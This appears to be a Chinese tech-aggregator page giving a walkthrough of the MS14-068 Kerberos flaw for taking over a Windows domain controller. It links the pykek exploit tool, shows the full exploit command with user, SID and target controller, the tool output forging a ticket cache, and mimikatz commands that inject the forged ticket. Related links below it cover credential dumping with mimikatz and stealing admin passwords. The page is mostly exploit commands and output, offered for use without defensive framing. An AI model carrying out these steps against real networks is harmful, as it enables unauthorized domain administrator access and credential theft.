2. 程式人生 > >ms14-068漏洞獲取域控管理員密碼

ms14-068漏洞獲取域控管理員密碼

阿新 發佈:2018-03-04
ms14-068

工具下載地址:https://github.com/bidord/pykek/ 

root@kali:~/sploit/pykek# python ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
Password: 
  [+] Building AS-REQ for dc-a-2003.dom-a.loc... Done!
  [+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done!
  [+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done!
  [+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done!
  [+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Creating ccache file '[email protected]'... Done!
root@kali:~/sploit/pykek# mv [email protected] /tmp/krb5cc_0

On Windows

python.exe ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
mimikatz.exe "kerberos::ptc [email protected]" exit`


ms14-068漏洞獲取域控管理員密碼

相關推薦

ms14-068漏洞獲取管理員密碼

ms14-068工具下載地址:https://github.com/bidord/pykek/ root@kali:~/sploit/pykek# python ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-15145604

mimikatz實戰滲透抓取管理員密碼

實驗環境:攻擊機:Kali靶 機:Windows server 2012工具:mimikatz2.1 這裡實驗所需要的工具我會上傳到我的資源裡面,有需要的小夥伴可以自己去下載 條件:靶機獲取到shell之後必須是管理員的許可權 步驟: **我這裡攻擊利用的msf裡面的

統一變更本地管理員密碼

fff ech itl title window ado term 技術 lib 策略:計算機配置-策略-Windows設置-腳本-啟動腳本:井號內為腳本內容###################################@echo offnet user leade

Responder探測內網獲取權限總結

Responder探測內網獲取域控權限Responder探測內網獲取域控權限總結(1)執行Responder探測內網(https://github.com/lgandx/Responder)./Responder.py -I eth0 -rPv(2)獲取172.16.157.133的Responder值(3)

【Windows Server 2019】管理員組別登陸計算機無效?

pro shadow mage 域控 51cto RoCE 圖片 png blog 問,我在AD創建000賬戶,並加入管理員組別,但是登陸Win7的時候無效。答, 登陸Win7,以為是有問題,重啟再次登錄,結果都是一致 登陸Win10,一切正常 普通用戶登陸,會提示沒有管理

滲透測試01- kali下的arp欺騙獲取web網站管理員密碼

滲透測試01- kali下的arp欺騙獲取web網站管理員密碼@TOC 初學者的筆記 1. 虛擬機器vmware 網路設定為橋接模式 配置kali虛擬機器ip與中間主機為統一網段 ifconfig eth0 192.168.1.55 netmask 255.255.255.0 配置完成後測試

CMS網站漏洞檢測對獲取管理員密碼漏洞如何修復

圖片 我們 src apache 地址 proc 攔截 sin 管理員密碼 PbootCMS是網站常用的一款CMS系統,是由國內著名程序開發商翔雲科技研發的一套網站CMS系統,免費開源,擴展性較高,使用的企業很多但是避免不了網站存在漏洞,SINE安全對其代碼進行安全審計的同

CMS網站漏洞修復對獲取管理員密碼漏洞如何修復

PbootCMS是網站常用的一款CMS系統,是由國內著名程式開發商翔雲科技研發的一套網站CMS系統,免費開源,擴充套件性較高,使用的企業很多但是避免不了網站存在漏洞,SINE安全對其程式碼進行安全審計的同時發現該pbootcms 存在嚴重的漏洞,包含SQL注入獲取管理員密碼漏洞,以及遠端程式碼注入執行漏洞。該

主流CMS網站漏洞檢測對獲取管理員密碼漏洞如何修復

PbootCMS是網站常用的一款CMS系統,是由國內著名程式開發商翔雲科技研發的一套網站CMS系統,免費開源,擴充套件性較高,使用的企業很多但是避免不了網站存在漏洞,SINE安全對其程式碼進行安全審計的同時發現該pbootcms 存在嚴重的漏洞,包含SQL注入獲取管理員密碼漏洞,以及遠端程式碼注入執

環境下調用本地管理員administrator賬戶權限,IP地址自動獲取

地址 int 自動 字串 windows 信息 comm ddr 添加 1.最近搬新公司 IP地址都是要自動獲取,現狀是800臺電腦IP地址都是手動配置好。需要把每臺電腦改成自動獲取,域用戶賬戶users沒有權限改網卡設置,需要IT手動改掉。2.針對此情況做了一個批處理調用

搭建IIS伺服器,利用弱口令web漏洞獲取到賬號密碼

一、搭建IIS (1)開啟windows server 2003,在管理工具中找到Internet(IIS)伺服器並開啟。展開網站,右鍵新建。     (2)輸入網站描述。點選下一步     (3)輸入網站ip地址,埠預設80,點選下一步 (

Azure VM密碼重置方法

   在azure上如果密碼忘記了,可以通過下圖進行重置    但我的VM是域控重置的時候就報錯了,不支援域控的重置     那就換個辦法,在azure的設定裡有個Extensions,點選Add &nbs

Python 修改AD賬號密碼(一)- 啟用LDAPS

啟用LDAP over SSL 原文地址:https://gist.github.com/magnetikonline/0ccdabfec58eb1929c997d22e7341e45 實驗環境 AD域名example.com

環境:使用者執行軟體,每次都提示輸入管理員密碼怎麼解決?

 Runas命令:能讓域使用者/普通User使用者以管理員身份執行指定程式。 在大多數企業中,為了安全起見,都會採用域環境集中管理域內資源,普通員工使用者只有user許可權,這樣做能大大提高安全性和可控性,但由此也帶來了一些困擾。 比如:某些特定的部門(如開發,科技)

Azure VM密碼重置方法

   在azure上如果密碼忘記了,可以通過下圖進行重置    但我的VM是域控重置的時候就報錯了,不支援域控的重置     那就換個辦法,在azure的設定裡有個Extensions,點選Add     在資源中找到自定義指令碼拓展,點選建立    

weblogic管理員密碼的修改後,服務不能啟動了

用來作為管理員的Weblogic使用者密碼過於簡單,我就通過瀏覽器訪問console,進入“安全領域”->”myrealm”->”使用者和組”->”weblogic”,後面的就簡單了。改了密碼就是了。更改密碼後,進行了登陸測試。OK! 但是,

【轉】weblogic管理員密碼的修改後,服務不能啟動了,咋辦?

總是發現問題了,才可以寫東西。這次就是,用來作為管理員的Weblogic使用者密碼過於簡單,我就通過瀏覽器訪問console,進入“安全領域”->"myrealm"->"使用者和組"->"weblogic",後面的就簡單了。改了密碼就是了。更改密碼後,進行

Discuz常見小問題2-如何修改管理員密碼,修改admin賬戶密碼

scu pan image family 詳情 點擊 用戶管理 admin src 進入後臺,點擊用戶,用戶管理,搜索admin這個用戶找到,然後點擊詳情 ?輸入新密碼即可(無需驗證老的密碼) ? ? ? ? ?Discuz常見小問題

Chrome瀏覽器快速獲取靜態件的XPATH

單選 書寫 粘貼 字符 htm 元素 動態控件 菜單 下拉框 一些靜態控件、可根據瀏覽器快速獲取xpath 步驟: 1、F12 2、定位到待定位控件 3、右鍵html元素,菜單選擇copy 4、下拉框選擇 copy xpath 5、粘貼 即可獲取xpath字符串。 動態控件

Linux centos 跳過管理員密碼進行登錄(單用戶模式、救援模式)

remount 無法 linu 單用戶 blog int 成功 程序 bios   這裏列舉了兩種更改或者取消管理員密碼登錄Linux系統的方法,其實兩種方法類似,都是想方設法跳過用戶認定,直接更改用戶文件、更改密碼的過程。   為了跳過系統正常啟動過程中的某些步驟,必須知